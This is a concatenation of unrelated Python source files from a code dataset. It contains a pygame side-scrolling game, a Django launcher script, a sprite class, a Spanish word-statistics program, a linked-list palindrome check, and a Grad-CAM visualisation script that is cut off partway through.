self.speedy\n\n if self.rect.right > WIDTH:\n self.rect.right = WIDTH\n if self.rect.left < 0:\n self.rect.left = 0\n\n def shoot(self):\n now = pygame.time.get_ticks()\n if now - self.last_shot > self.shoot_delay:\n self.last_shot = now\n if self.power >= 1:\n bullet = Bullet(self.rect.right, self.rect.centery)\n all_sprites.add(bullet)\n bullets.add(bullet)\n shoot_sound.play()\n keystate = pygame.key.get_pressed()\n if keystate[pygame.K_SPACE]:\n self.shoot()\n\n def hide(self):\n # hide the player temporarily\n self.hidden = True\n self.hide_timer = pygame.time.get_ticks()\n self.rect.center = (WIDTH / 2, HEIGHT + 200)\n\nclass Mob(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image_orig = random.choice(meteor_images)\n self.image = self.image_orig.copy()\n self.rect = self.image.get_rect()\n self.radius = int(self.rect.width * 0.45 / 2)\n pygame.draw.circle(self.image, RED, self.rect.center, self.radius)\n self.rect.x = 1300\n self.rect.y = random.randrange(60, 640)\n self.speedx = random.randrange(6, 10)\n self.rot = 0\n self.rot_speed = random.randrange(-8, 8)\n self.last_update = pygame.time.get_ticks()\n\n def rotate(self):\n now = pygame.time.get_ticks()\n if now - self.last_update > 50:\n self.last_update = now\n self.rot = (self.rot + self.rot_speed) % 360\n new_image = pygame.transform.rotate(self.image_orig, self.rot)\n old_center = self.rect.center\n self.image = new_image\n self.rect = self.image.get_rect()\n self.rect.center = old_center\n\n def update(self):\n self.rotate()\n self.rect.x -= self.speedx\n if self.rect.right < 0:\n self.rect.x = 1300\n self.rect.y = random.randrange(60, 640)\n self.speedx = random.randrange(6, 10)\n\nclass Bullet(pygame.sprite.Sprite):\n def __init__(self, x, y):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface((10, 5))\n self.image.fill(RED)\n self.rect = self.image.get_rect()\n self.rect.bottom = y\n self.rect.centerx = x\n self.speedx = -4\n\n def update(self):\n self.rect.x -= self.speedx\n # Kill the bullet when off the screen\n if self.rect.centerx < -10:\n self.kill()\n #if self.rect.centerx > 500:\n # self.kill()\n\nclass Pow(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.type = random.choice(['shield', 'gun', 'pill'])\n self.image = powerup_images[self.type]\n self.rect = self.image.get_rect()\n self.rect.x = random.randrange(1300, 1800)\n self.rect.y = HEIGHT / 2\n self.speedx = random.randrange(6, 10)\n\n def update(self):\n self.rect.x -= self.speedx\n if self.rect.right < 0:\n self.rect.x = 1300\n self.rect.y = HEIGHT / 2\n self.speedx = random.randrange(6, 10)\n\nclass Explosion(pygame.sprite.Sprite):\n def __init__(self, center, size):\n pygame.sprite.Sprite.__init__(self)\n self.size = size\n self.image = explosion_anim[self.size][0]\n self.rect = self.image.get_rect()\n self.rect.center = center\n self.frame = 0\n self.last_update = pygame.time.get_ticks()\n self.frame_rate = 75\n\n def update(self):\n now = pygame.time.get_ticks()\n if now - self.last_update > self.frame_rate:\n self.last_update = now\n self.frame += 1\n if self.frame == len(explosion_anim[self.size]):\n self.kill()\n else:\n center = self.rect.center\n self.image = explosion_anim[self.size][self.frame]\n self.rect = self.image.get_rect()\n self.rect.center = center\n\n# Load all game graphics\nscreen = pygame.display.set_mode((WIDTH, HEIGHT), pygame.FULLSCREEN)\nheart = pygame.image.load(path.join(img_dir, \"heart_2.gif\")).convert()\nlive = pygame.transform.scale(heart, (30, 30))\nmeteor_images = []\nmeteor_list = ['small1.png', 'small2.png', 'small3.png', 'small4.png', 'small5.png', 'small6.png',\n 'medium1.png', 'medium2.png', 'medium3.png', 'medium4.png', 'medium5.png', 'medium5.png']\nfor img in meteor_list:\n meteor_images.append(pygame.image.load(path.join(img_dir, img)).convert_alpha())\n\n# Directory explosion images\nexplosion_anim = {}\nexplosion_anim['lg'] = []\nexplosion_anim['sm'] = []\nexplosion_anim['player'] = []\nfor i in range (9):\n filename = 'regularExplosion0{}.png'.format(i)\n img = pygame.image.load(path.join(img_dir, filename)).convert_alpha()\n img_lg = pygame.transform.scale(img, (75, 75))\n explosion_anim['lg'].append(img_lg)\n img_sm = pygame.transform.scale(img, (32, 32))\n explosion_anim['sm'].append(img_sm)\n filename = 'sonicExplosion0{}.png'.format(i)\n img = pygame.image.load(path.join(img_dir, filename)).convert_alpha()\n explosion_anim['player'].append(img)\n\n# Directory power up images\npowerup_images = {}\npowerup_images['shield'] = pygame.image.load(path.join(img_dir, 'shield_silver.png')).convert_alpha()\npowerup_images['gun'] = pygame.image.load(path.join(img_dir, 'bold_silver.png')).convert_alpha()\npowerup_images['pill'] = pygame.image.load(path.join(img_dir, 'pill_yellow.png')).convert_alpha()\n\n# Load all game sounds\nshoot_sound = pygame.mixer.Sound(path.join(snd_dir, 'laser1.wav'))\nshoot_sound.set_volume(0.2)\nexpl_sound = pygame.mixer.Sound(path.join(snd_dir, 'explosion.wav'))\nexpl_sound.set_volume(0.2)\nplayer_die_sound = pygame.mixer.Sound(path.join(snd_dir, 'rumble1.ogg'))\nplayer_die_sound.set_volume(0.2)\npygame.mixer.music.load(path.join(snd_dir, 'space.ogg'))\npygame.mixer.music.set_volume(0.35)\n\npygame.display.set_caption(\"Space Escape\")\nclock = pygame.time.Clock()\n\nbackground = pygame.image.load(\"SE/starfield.jpg\").convert()\n\ntunnels = pygame.sprite.Group()\nall_sprites = pygame.sprite.Group()\n\n# Game loop\n\ndef Escape_Game(ext_screen, story):\n print(story)\n global all_sprites, mobs, bullets, tunnel_gat, screen, powerups\n\n screen = ext_screen\n newscore = 0\n running = True\n game_over = True\n pygame.mixer.music.play(loops=-1)\n\n x = 0\n tunnel_gat = 400\n tunnel_half = (HEIGHT / 2) - (tunnel_gat / 2)\n tunnel_i = 0\n tunnel_hoogte = 200\n\n diff_1 = False\n diff_2 = False\n diff_3 = False\n\n while running:\n if game_over:\n show_go_screen()\n mobs = pygame.sprite.Group()\n bullets = pygame.sprite.Group()\n powerups = pygame.sprite.Group()\n player = Player()\n all_sprites.add(player)\n game_over = False\n\n score = 0\n for i in range(10):\n newmob()\n\n # Keep loop running at the right speed\n clock.tick(FPS)\n # Process input (events)\n for event in pygame.event.get():\n # Check for closing window\n if pygame.key.get_pressed()[pygame.K_ESCAPE] or pygame.key.get_pressed()[pygame.K_q]:\n all_sprites.empty()\n mobs.empty()\n bullets.empty()\n powerups.empty()\n running = False\n tunnel_gat = 400\n tunnel_half = (HEIGHT / 2) - (tunnel_gat / 2)\n if running == False:\n pygame.mixer.music.fadeout(1000)\n\n # Keep Creating Tunnels\n for tunnel in tunnels: # Tunnels weghalen als ze van scherm af gaan\n if tunnel.rect.x <= -10:\n tunnel.kill()\n\n while len(tunnels) < (128 * 2) + 25:\n print(tunnel_half)\n while tunnel_hoogte > tunnel_half:\n tunnel_hoogte += -10\n print('1')\n while tunnel_hoogte <= 0:\n tunnel_hoogte += 10\n print('2')\n\n tunnel_hoogte += random.randrange(-5, 8)\n\n # Boven Helft Tunnel\n t = Tunnel(WIDTH + 10, 0, tunnel_hoogte)\n tunnels.add(t)\n # Onder Helft Tunnel\n t = Tunnel(WIDTH + 10, HEIGHT - tunnel_hoogte, tunnel_hoogte)\n tunnels.add(t)\n\n if x < 100:\n score += 0.25\n\n if score > newscore + 400:\n newpowerup()\n newscore = score\n\n if score > 1000 and not diff_1:\n print(\"Updated\")\n tunnel_gat = 300\n tunnel_half = (HEIGHT / 2) - (tunnel_gat / 2)\n diff_1 = True\n\n if score > 2000 and not diff_2:\n print(\"Updated\")\n tunnel_gat = 200\n tunnel_half = (HEIGHT / 2) - (tunnel_gat / 2)\n diff_2 = True\n\n if score > 3000 and not diff_3:\n print(\"Updated\")\n tunnel_gat = 150\n tunnel_half = (HEIGHT / 2) - (tunnel_gat / 2)\n diff_3 = True\n\n if score > 3000 and story == True:\n running = False\n\n #if score > 4000 and not diff_2:\n # print(\"Updated\")\n # tunnel_gat = 200\n # tunnel_half = (HEIGHT / 2) - (tunnel_gat / 2)\n # diff_2 = True\n\n # Update\n all_sprites.update()\n tunnels.update()\n\n # Check to see if a bullet hit mob\n hits = pygame.sprite.groupcollide(mobs, bullets, True, True)\n for hit in hits:\n score += 50 - hit.radius\n expl_sound.play()\n expl = Explosion(hit.rect.center, 'lg')\n all_sprites.add(expl)\n newmob()\n\n # Check to see if the player hits the wall\n hits = pygame.sprite.spritecollide(player, tunnels, False, pygame.sprite.collide_circle)\n for hit in hits:\n player.shield -= 10\n expl = Explosion(hit.rect.center, 'sm')\n all_sprites.add(expl)\n if player.shield <= 0:\n player_die_sound.play()\n death_explosion = Explosion(player.rect.center, 'player')\n all_sprites.add(death_explosion)\n player.hide()\n player.lives -= 1\n player.shield = 100\n\n # Check to see if a mob hits the wall\n hits = pygame.sprite.groupcollide(mobs, tunnels, True, False)\n for hit in hits:\n newmob()\n\n # Check to see if a power up hits the wall\n hits = pygame.sprite.groupcollide(powerups, tunnels, True, False)\n for hit in hits:\n newpowerup()\n\n # Check to see if the player hit a powerup\n hits = pygame.sprite.spritecollide(player, powerups, True, pygame.sprite.collide_mask)\n for hit in hits:\n if hit.type == 'shield':\n player.shield += random.randrange(10, 50)\n if player.shield >= 100:\n player.shield = 100\n if hit.type == 'gun':\n player.powerup()\n if hit.type == 'pill':\n player.shield += random.randrange(10, 50)\n if player.shield >= 100:\n player.shield = 100\n player.powerup()\n\n # Check to see if a mob hit the player\n hits = pygame.sprite.spritecollide(player, mobs, True, pygame.sprite.collide_circle)\n for hit in hits:\n player.shield -= hit.radius * 0.5\n expl = Explosion(hit.rect.center, 'sm')\n all_sprites.add(expl)\n newmob()\n if player.shield <= 0:\n player_die_sound.play()\n death_explosion = Explosion(player.rect.center, 'player')\n all_sprites.add(death_explosion)\n player.hide()\n player.lives -= 1\n player.shield = 100\n\n # If the player died and the explosion has finished playing\n if player.lives <= 0 and not death_explosion.alive():\n game_over = True\n tunnels.empty()\n all_sprites.empty()\n diff_1 = False\n diff_2 = False\n diff_3 = False\n tunnel_gat = 400\n tunnel_half = (HEIGHT / 2) - (tunnel_gat / 2)\n\n # Draw / Render\n rel_x = x % background.get_rect().width\n\n screen.blit(background, (rel_x - background.get_rect().width, 0))\n if rel_x < WIDTH:\n screen.blit(background, (rel_x, 0))\n x -= 2\n\n all_sprites.draw(screen)\n tunnels.draw(screen)\n\n draw_text(screen, str(int(score)), 30, WIDTH / 2, 10)\n draw_shield_bar(screen, 5, 5, player.shield)\n draw_lives(screen, WIDTH - 100, 5, player.lives, live)\n # After drawing everything, flip the display\n pygame.display.flip()","sub_path":"SE/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"228934404","text":"import sys\nimport os.path\n\ndjango_starter = 'python manage.py '\n\ndef install_django_2():\n answer = input(\"Do you want to install Django 2 to run this code [n/y]? \")\n if(answer.lower() == 'y'):\n print('Installing Django 2.')\n import pip\n pip.main(['install', 'django==2.0'])\n\ndef first_call():\n return not os.path.isfile('no_migration')\n\ndef generate_migrations():\n os.system(django_starter + \"makemigrations\")\n os.system(django_starter + \"migrate\")\n\n file = open('no_migration', 'w')\n file.close()\n\nif __name__ == \"__main__\":\n\n if(sys.version_info[0] < 3):\n print(\"Sorry! This project requires at least Python 3.\")\n else:\n try:\n import django\n if django.VERSION[0] > 2:\n install_django_2()\n except ImportError:\n install_django_2()\n\n print(\"Initializing Django:\")\n\n if first_call():\n generate_migrations()\n\n if len(sys.argv) > 1 and sys.argv[1] == 'test':\n os.system(django_starter + \"test\")\n else:\n os.system(django_starter + \"runserver --noreload\")","sub_path":"paranuaraChallenge/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"626980483","text":"import pygame\n\nclass Line(pygame.sprite.Sprite):\n '''Class for a line.\n Inherits from a sprite so it can be easily added to sprite groups.'''\n def __init__(self, surface=None, color=(255,255,255), posOne=(0,0), posTwo=(0,0), width=1, transparent=True, *groups):\n super().__init__(groups)\n self.color = color\n self.posOne = posOne\n self.posTwo = posTwo\n self.width = width\n self.rect= None\n self.image = None\n self.surface = surface\n self.transparent = transparent\n\n self.update()\n\n def draw(self, surface):\n self.rect = pygame.draw.line(self.surface, self.color, self.posOne, self.posTwo, self.width)\n self.image = pygame.Surface((self.rect.w, self.rect.h))\n if self.transparent:\n self.image.set_colorkey((0,0,0))\n self.surface.blit(self.image, self.rect)\n\n def update(self):\n self.rect = pygame.draw.line(self.surface, self.color, self.posOne, self.posTwo, self.width)\n self.image = pygame.Surface((self.rect.w, self.rect.h))\n if self.transparent:\n self.image.set_colorkey((0,0,0))\n","sub_path":"lightning/line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"358082622","text":"# Información del programa\n# Nombre del programa: Descubre tu palabra\n# Autor: Hernán Araya\n# Descripción: El programa muestra información sobre la palabra ingresada, así como\n# el número de letras, el número de consonantes y vocales, las letras que se repiten y su cantidad\n\n# Declaración del diccionarrio para el alfabeto\ndict_alfabeto = {'a': 1, 'b': 1, 'c': 1, 'd': 1, 'e': 1, 'f': 1, 'g': 1, 'h': 1, 'i': 1, 'j': 1,\n 'k': 1, 'l': 1, 'm': 1, 'ñ': 1, 'n': 1, 'o': 1, 'p': 1, 'q': 1, 'r': 1, 's': 1,\n 't': 1, 'u': 1, 'v': 1, 'w': 1, 'x': 1, 'y': 1, 'z': 1}\n\n# Declaración de variables para manipular los datos\nvocales = 0\nconsonantes = 0\nletras_repetidas = 0\ndict_letras_repetidas = {}\nlista_palabras_ingresadas = []\nletra_encontrada = 0\n\n# Menu del programa\nwhile True:\n print(\"\"\"\n Bienvenido a \\u001b[32;1m'Descubre tu palabra'\\u001b[0m\n 1.Iniciar programa \n 2.Salir\"\"\")\n opcion = int(input(\"Escoja una opcion: \"))\n\n if opcion == 1:\n # Solicitud de la palabra\n palabra = str(input(\"Escriba una palabra: \"))\n\n # Ciclo para evaluar si la palabra tiene caracteres diferentes a las letras\n while not palabra.isalpha():\n print(\"\\u001b[31;1mEl dato ingresado es incorrecto, intentelo de nuevo\\u001b[0m\")\n palabra = str(input(\"Escriba una palabra nuevamente: \"))\n\n if palabra.isalpha():\n # Ciclo para la cantidad de consonantes y vocales\n for i in palabra.lower():\n if (i == 'a') or (i == 'e') or (i == 'i') or (i == 'o') or (i == 'u'):\n vocales += 1\n else:\n consonantes += 1\n\n # Función para conocer la cantidad de letras que tiene la palabra ingresada\n numero_letras = len(palabra)\n\n # Ciclo para saber la cantidad de veces que se repite una letra\n for clave, valor in dict_alfabeto.items():\n for i in palabra:\n if i == clave:\n letras_repetidas += valor\n\n dict_letras_repetidas[clave] = letras_repetidas\n\n letras_repetidas = 0\n\n# ---------------------------------------------------------------------------------------------------------\n # Información sobre la palabra ingresada\n print(f\"\\nSu palabra es: \\u001b[36;1m{palabra} \\u001b[0m\")\n print(f\"Su palabra tiene {numero_letras} letras, {consonantes} consonantes y {vocales} vocales\")\n\n # Ciclo que muestra la cantidad de veces que se repite una letra\n for k, v in dict_letras_repetidas.items():\n if v != 0:\n if v == 1:\n print(f\"La letra: {k} se repite: {v} vez\")\n if v > 1:\n print(f\"La letra: {k} se repite: {v} veces\")\n\n# -------------------------------------------------------------------------------------------------------\n # Buscar la posición en que se encuentra una letra ingresada\n print(\"\\n\\u001b[34;1mConozca la posición en que se encuentra una letra de la palabra ingresada\\u001b[0m\")\n letra = str(input('Ingrese una letra para conocer en que posición se encuentra: '))\n\n # Ciclo para validar el ingreso de letras\n while letra not in palabra:\n print(\"\\u001b[31;1mEl dato ingresado no pertenece a la palabra ingresada intentelo de nuevo\\u001b[0m\")\n letra = str(input(\"Escriba una letra nuevamente: \"))\n\n if letra in palabra:\n # print(\"la letra SI EXISTE EN LA CADENA\")\n print(f\"Palabra es: \\u001b[31;1m {palabra} \\u001b[0m y la letra ingresada \"\n f\"es: \\u001b[31;1m {letra}\\u001b[0m\\n\")\n\n # Ciclo para conocer en que posición se encuentra una letra de la palabra ingresada\n for i in range(len(palabra)):\n if letra == palabra[i]:\n print(f\"La letra \\u001b[31;1m {letra} \\u001b[0m se encuentra en la posicion: {i+1}\")\n\n # Limpieza de variables\n vocales = 0\n consonantes = 0\n elif opcion == 2:\n print(\"Saliendo del programa...\")\n break\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"237170870","text":"\"\"\"\nGiven a singly linked list, determine if it is a palindrome.\n\nExample 1:\n\nInput: 1->2\nOutput: false\nExample 2:\n\nInput: 1->2->2->1\nOutput: true\nFollow up:\nCould you do it in O(n) time and O(1) space\n\"\"\"\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\ndef is_palindrome(head):\n \"\"\"Runtime: 76 ms, faster than 78.65% of Python3 online submissions for Palindrome Linked List.\n\"\"\"\n start1 = head\n runner1 = head\n runner2 = head\n while runner2 and runner2.next:\n runner1 = runner1.next\n runner2 = runner2.next.next\n\n start2 = runner1.next if runner2 and runner2.next is None else runner1\n\n arr1, arr2 = [], []\n while start2:\n arr1.append(start1.val)\n arr2.append(start2.val)\n start1 = start1.next\n start2 = start2.next\n\n return arr1 == arr2[::-1]\n\nhead = ListNode(1)\nhead.next = ListNode(0)\nhead.next.next = ListNode(1)\nprint(is_palindrome(head))","sub_path":"9_training/LL_palindrome.py","file_name":"LL_palindrome.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"499702636","text":"import torch\nfrom torch.autograd import Variable\nfrom torch.autograd import Function\nfrom torchvision import models\nfrom torchvision import utils\nimport cv2\nimport os\nimport numpy as np\nimport argparse\nimport torch.nn.functional as F\nfrom OXFORD_IIIT.src.densenet_DIY import densenet_DIY_40,densenet_DIY_64,densenet_DIY_CliqueNet_s3,densenet_DIY_100\nfrom OXFORD_IIIT.src.build_model import CNNModel\nimport OXFORD_IIIT.cliqueNet_pytorch.cliquenet as cliquenet\nfrom OXFORD_IIIT.grad_cam.grad_cam_cliquenet import model_checkpoint_targetLayerName as clique_model_checkpoint_targetLayerName\nfrom OXFORD_IIIT.grad_cam.grad_cam_densenet40 import model_checkpoint_targetLayerName as densenet40_model_checkpoint_targetLayerName\n\ndef get_args():\n\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--use-cuda', action='store_true', default=True, help='Use NVIDIA GPU acceleration')\n\tparser.add_argument('--image-path', type=str, default='./database/examples/Birman_3.jpg', help='Input image path')\n\n\targs = parser.parse_args()\n\n\targs.use_cuda = args.use_cuda and torch.cuda.is_available()\n\tif args.use_cuda:\n\t\tprint(\"Using GPU for acceleration\")\n\telse:\n\t\tprint(\"Using CPU for computation\")\n\n\treturn args\n\ndef preprocess_image(img):\n\t'''\n\n\t:param img: : (224, 224, 3)\n\t:return:\n\t'''\n\tmeans=[0.485, 0.456, 0.406]\n\tstds=[0.229, 0.224, 0.225]\n\n\tpreprocessed_img = img.copy()[: , :, ::-1] # preprocessed_img : (224, 224, 3)\n\tfor i in range(3):\n\t\tpreprocessed_img[:, :, i] = preprocessed_img[:, :, i] - means[i]\n\t\tpreprocessed_img[:, :, i] = preprocessed_img[:, :, i] / stds[i]\n\tpreprocessed_img = np.ascontiguousarray(\n\t\tnp.transpose(preprocessed_img, (2, 0, 1))) # : (3, 224, 224)\n\tpreprocessed_img = torch.from_numpy(preprocessed_img) # torch.Size([3, 224, 224])\n\tpreprocessed_img.unsqueeze_(0) # torch.Size([1, 3, 224, 224])\n\tinput = Variable(preprocessed_img, requires_grad = True) # torch.Size([1, 3, 224, 224])\n\treturn input\n\ndef show_origin_image(img_path):\n\tfrom PIL import Image\n\timg_name = os.path.split(img_path)[-1].split('.')[0]\n\tviz.image(torch.from_numpy(np.asarray(\n\t\tImage.open(img_path).resize((255, 255), Image.ANTIALIAS))).permute(2, 0, 1),\n\t\t\t opts=dict(title=img_name))\n\ndef show_cam_on_image(img_path, mask, model_name, suffix='.png'):\n\timg = cv2.imread(img_path)\n\theight, width, _ = img.shape\n\t# heatmap = cv2.applyColorMap(np.uint8(255*mask), cv2.COLORMAP_JET) # 还原至原图大小,并上色\n\theatmap = cv2.applyColorMap(cv2.resize(np.uint8(255*mask), (width, height)), cv2.COLORMAP_JET) # 还原至原图大小,并上色\n\n\t# heatmap = np.float32(heatmap) / 255\n\tcam = heatmap + np.float32(img)\n\tcam = cam / np.max(cam)\n\t# saved_filepath = os.path.join(img_path.split('.')[0] + suffix)\n\t# cv2.imwrite(saved_filepath, np.uint8(255 * cam))\n\n\t# from PIL import Image\n\t# img_name = os.path.split(img_path)[-1].split('.')[0]\n\t# viz.image(torch.from_numpy(np.asarray(Image.open(img_path).resize((255, 255), Image.ANTIALIAS))).permute(2, 0, 1),opts=dict(title=img_name))\n\tnp_num = np.uint8(255 * cam)\n\ttorch_num = torch.from_numpy(np.uint8(255 * cam))\n\tviz.image(torch.from_numpy(cv2.resize(np.uint8(255 * cam), (255, 255))).permute(2, 0, 1),opts=dict(title=model_name))\n\t# viz.image(torch.from_numpy(cv2.resize(np.uint8(255 * cam), (255, 255))).permute(2, 1, 0),opts=dict(title=model_name))\n\nclass FeatureExtractor():\n\t'''\n\tClass for extracting activations and registering gradients from targetted intermediate layers\n\t'''\n\n\tdef __init__(self, model, target_layers):\n\t\tself.model = model\n\t\tself.target_layers = target_layers\n\t\tself.gradients = []\n\n\tdef save_gradient(self, grad): # grad\n\t\tself.gradients.append(grad)\n\n\tdef __call__(self, x):\n\t\toutputs = []\n\t\tself.gradients = []\n\t\tfor name, module in self.model._modules.items():\n\t\t\tx = module(x) # x 每经过一次moudle() x.shape都会发生变化 例如, torch.Size([1, 3, 224, 224]) → torch.Size([1, 64, 224, 224])\n\t\t\tif name in self.target_layers: # match the targetted intermediate layers\n\t\t\t\tx.register_hook(self.save_gradient) # registering gradients from targetted intermediate layers\n\t\t\t\toutputs += [x]\n\t\treturn outputs, x # x -- 'last_feature' # outputs -- 'match_features'\n\nclass ModelOutputs():\n\t'''\n\tClass for making a forward pass, and getting: (return)\n\t1. The network output. # output\n\t2. Activations from intermeddiate targetted layers. # target_activations\n\t3. Gradients from intermeddiate targetted layers. # self.feature_extractor.gradients\n\t'''\n\n\tdef __init__(self, model, target_layers):\n\t\tself.model = model\n\t\tself.feature_extractor = FeatureExtractor(self.model.features, target_layers) # __init__\n\n\tdef get_gradients(self):\n\t\treturn self.feature_extractor.gradients\n\n\tdef __call__(self, x):\n\t\ttarget_activations, output = self.feature_extractor(x) # x: feature # output -- last_feature torch.Size([1, 512, 7, 7]) / torch.Size([1, 2208, 7, 7])\n\t\tif 'DenseNet' in str(type(self.model)):\n\t\t\toutput = F.relu(output, inplace=True)\n\t\t\toutput = F.adaptive_avg_pool2d(output, (1, 1)).view(output.size(0), -1)\n\t\telse:\n\t\t\toutput = output.view(output.size(0), -1) # torch.Size([1, 25088])\n\t\toutput = self.model.classifier(output) # torch.Size([1, 1000])\n\n\t\treturn target_activations, output # target_activations {list} target_activations[0] torch.Size([1, 512, 14, 14]) # output torch.Size([1, 1000])\n\nclass GradCam():\n\tdef __init__(self, model, target_layer_names, use_cuda):\n\t\tself.model = model\n\t\tself.model.eval()\n\t\tself.cuda = use_cuda\n\t\tif self.cuda:\n\t\t\tself.model = model.cuda()\n\n\t\tself.extractor = ModelOutputs(self.model, target_layer_names) # __init__\n\n\tdef forward(self, input):\n\t\treturn self.model(input)\n\n\tdef __call__(self, input, index = None):\n\n\t\t'''\n\n\t\t:param input:\n\t\t:param index: # If None, returns the map for the highest scoring category.\n\t\t\t\t\t# Otherwise, targets the requested index.\n\t\t:return:\n\t\t'''\n\n\t\tif self.cuda:\n\t\t\t# features -- Activations from intermeddiate targetted layers.(target_activations) Ex. target_activations[0] torch.Size([1, 512, 14, 14])\n\t\t\t# output -- The network output. (last feature) Ex. torch.Size([1, 1000])\n\t\t\tfeatures, output = self.extractor(input.cuda()) # __call__\n\t\telse:\n\t\t\tfeatures, output = self.extractor(input)\n\n\t\tif index == None:\n\t\t\tindex = np.argmax(output.cpu().data.numpy())\n\n\t\tone_hot = np.zeros((1, output.size()[-1]), dtype = np.float32) # : (1, 1000)\n\t\tone_hot[0][index] = 1 # '激活' 最匹配的unit_index\n\t\tone_hot = Variable(torch.from_numpy(one_hot), requires_grad = True)\n\t\tif self.cuda:\n\t\t\tone_hot = torch.sum(one_hot.cuda() * output)\n\t\telse:\n\t\t\tone_hot = torch.sum(one_hot * output)\n\n\t\tself.model.features.zero_grad() # zero_grad ...\n\t\tself.model.classifier.zero_grad()\n\t\tone_hot.backward(retain_graph=True) #....\n\n\t\tgrads_val = self.extractor.get_gradients()[-1].cpu().data.numpy() # grads_val : (1, 512, 14, 14) # gradients torch.Size([1, 512, 14, 14])\n\n\t\ttarget = features[-1] # target torch.Size([1, 512, 14, 14]) # features[0] torch.Size([1, 512, 14, 14]) # last_conv\n\t\ttarget = target.cpu().data.numpy()[0, :] # : (512, 14, 14)\n\n\t\tweights = np.mean(grads_val, axis = (2, 3))[0, :] # : (512,) # 基于梯度获取权重!!!\n\t\tcam = np.zeros(target.shape[1 : ], dtype = np.float32) # : (14, 14)\n\n\t\tfor i, w in enumerate(weights):\n\t\t\tcam += w * target[i, :, :] # target : (512, 14, 14) # 加权和的方式得到激活图\n\n\t\tcam = np.maximum(cam, 0)\n\t\tcam = cv2.resize(cam, (224, 224))\n\t\tcam = cam - np.min(cam)\n\t\tcam = cam / np.max(cam) # 归一化\n\t\treturn cam\n\nclass GuidedBackpropReLU(Function):\n\n\tdef forward(self, input):\n\t\tpositive_mask = (input > 0).type_as(input)\n\t\toutput = torch.addcmul(torch.zeros(input.size()).type_as(input), input, positive_mask)\n\t\tself.save_for_backward(input, output)\n\t\treturn output\n\n\tdef backward(self, grad_output):\n\t\tinput, output = self.saved_tensors\n\t\tgrad_input = None\n\n\t\tpositive_mask_1 = (input > 0).type_as(grad_output)\n\t\tpositive_mask_2 = (grad_output > 0).type_as(grad_output)\n\t\tgrad_input = torch.addcmul(torch.zeros(input.size()).type_as(input), torch.addcmul(torch.zeros(input.size()).type_as(input), grad_output, positive_mask_1), positive_mask_2)\n\n\t\treturn grad_input\n\nclass GuidedBackpropReLUModel:\n\tdef __init__(self, model, use_cuda):\n\t\tself.model = model\n\t\tself.model.eval()\n\t\tself.cuda = use_cuda\n\t\tif self.cuda:\n\t\t\tself.model = model.cuda()\n\n\t\t# # replace ReLU with GuidedBackpropReLU\n\t\t# for idx, module in self.model.features._modules.items():\n\t\t# \tif module.__class__.__name__ == 'ReLU':\n\t\t# \t\tself.model.features._modules[idx] = GuidedBackpropReLU()\n\n\tdef forward(self, input):\n\t\treturn self.model(input)\n\n\tdef __call__(self, input, index = None):\n\t\tif self.cuda:\n\t\t\toutput = self.forward(input.cuda())\n\t\telse:\n\t\t\toutput = self.forward(input)\n\n\t\tif index == None:\n\t\t\tindex = np.argmax(output.cpu().data.numpy())\n\n\t\tone_hot = np.zeros((1, output.size()[-1]), dtype = np.float32)\n\t\tone_hot[0][index] = 1\n\t\tone_hot = Variable(torch.from_numpy(one_hot), requires_grad = True)\n\t\tif self.cuda:\n\t\t\tone_hot = torch.sum(one_hot.cuda() * output)\n\t\telse:\n\t\t\tone_hot = torch.sum(one_hot * output)\n\n\t\t# self.model.features.zero_grad()\n\t\t# self.model.classifier.zero_grad()\n\t\tone_hot.backward(retain_graph=True)\n\t\t# output.backward(gradient=one_hot)\n\n\t\toutput = input.grad.cpu().data.numpy() #: (1, 3, 224, 224)\n\t\toutput = output[0,:,:,:]\n\n\t\treturn output\n\n\ndef model_checkpoint_targetLayerName(model, checkpoint_dirpath, target_layer_names):\n\t# load the pre-saved model\n\ttry:\n\t\tlast_saved_model = sorted(os.listdir(checkpoint_dirpath))[-1]\n\t\tload_model_path = checkpoint_dirpath + last_saved_model\n\t\tif 'pkl' in last_saved_model:\n\t\t\tmodel.load_state_dict(torch.load(load_model_path))\n\t\t\tprint('load the saved %s successfully ~' % load_model_path)\n\texcept Exception as e:\n\t\tprint(e)\n\t\tpass\n\n\tmodel.eval()\n\t# print(model)\n\n\tgrad_cam = GradCam(model, target_layer_names, use_cuda=args.use_cuda)\n\n\treturn grad_cam\n\nif __name__ == '__main__':\n\n\t\"\"\" \n\tpython grad_cam.py \n\t1. Loads an image with opencv.\n\t2. Preprocesses it for VGG19 and converts to a pytorch variable.\n\t3. Makes a forward pass to find the category index with the highest score,\n\tand computes intermediate activations.\n\tMakes the visualization. \n\t\"\"\"\n\n\targs = get_args()\n\n\t# Single_CNN\n\tmodel = CNNModel()\n\tcheckpoint_dirpath = 'Results/model/cnn/batchsize_256/'\n\ttarget_layer_names = [\"31\"] # relu层效果更好\n\tgrad_cam_Single_CNN = model_checkpoint_targetLayerName(model,checkpoint_dirpath,target_layer_names)\n\n\t# DenseNet-40\n\tmodel = densenet_DIY_40()\n\tcheckpoint_dirpath = 'Results/model/DenseNet/densenet_DIY/depth_40_k_48/'\n\ttarget_layer_names = [\"norm5\"]\n\tgrad_cam_Densenet_40 = densenet40_model_checkpoint_targetLayerName(model,checkpoint_dirpath,target_layer_names)\n\n\t# DenseNet-100\n\tmodel = densenet_DIY_100()\n\tcheckpoint_dirpath = 'Results/model/DenseNet/densenet_DIY/depth_100_k_32/'\n\ttarget_layer_names = [\"norm5\"]\n\tgrad_cam_Densenet_100 = 